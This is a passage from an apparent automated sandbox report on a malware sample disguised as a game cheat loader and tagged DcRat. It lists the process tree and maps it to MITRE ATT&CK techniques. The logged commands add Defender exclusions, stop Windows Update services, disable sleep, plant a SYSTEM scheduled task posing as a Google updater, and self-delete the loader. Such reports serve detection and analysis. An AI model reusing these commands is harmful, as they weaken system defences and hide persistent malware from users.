C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\eqrnvskqnorc.xml"
1⤵
PID:5044
-
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:5108
-
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"
1⤵
PID:3512
-
C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
2⤵
PID:6480
-
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "396604439-645672372-759287508-9828758832110148470-1675912147-1457241955333429844"
1⤵
PID:7096
-
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:1912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
- Command and Scripting Interpreter: PowerShell
PID:1472
-
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:2124
-
C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:4032
-
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:2504
-
C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:3260
-
C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:1504
-
C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:3232
-
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
- Power Settings
PID:4928
-
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
- Power Settings
PID:4712
-
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
- Power Settings
PID:5920
-
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
- Power Settings
PID:1728
-
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
- Power Settings
PID:4880
-
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\eqrnvskqnorc.xml"
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4564
-
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:5344
-
C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:560
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter: 1
- PowerShell: 1
- Scheduled Task/Job: 1
- Scheduled Task: 1
- System Services: 1
- Service Execution: 1
Persistence
- Boot or Logon Autostart Execution: 2
- Registry Run Keys / Startup Folder: 1
- Winlogon Helper DLL: 1
- Create or Modify System Process: 1
- Windows Service: 1
- Power Settings: 1
- Scheduled Task/Job: 1
- Scheduled Task: 1
Privilege Escalation
- Abuse Elevation Control Mechanism: 1
- Bypass User Account Control: 1
- Boot or Logon Autostart Execution: 2
- Registry Run Keys / Startup Folder: 1
- Winlogon Helper DLL: 1
- Create or Modify System Process: 1
- Windows Service: 1
- Scheduled Task/Job: 1
- Scheduled Task: 1
Downloads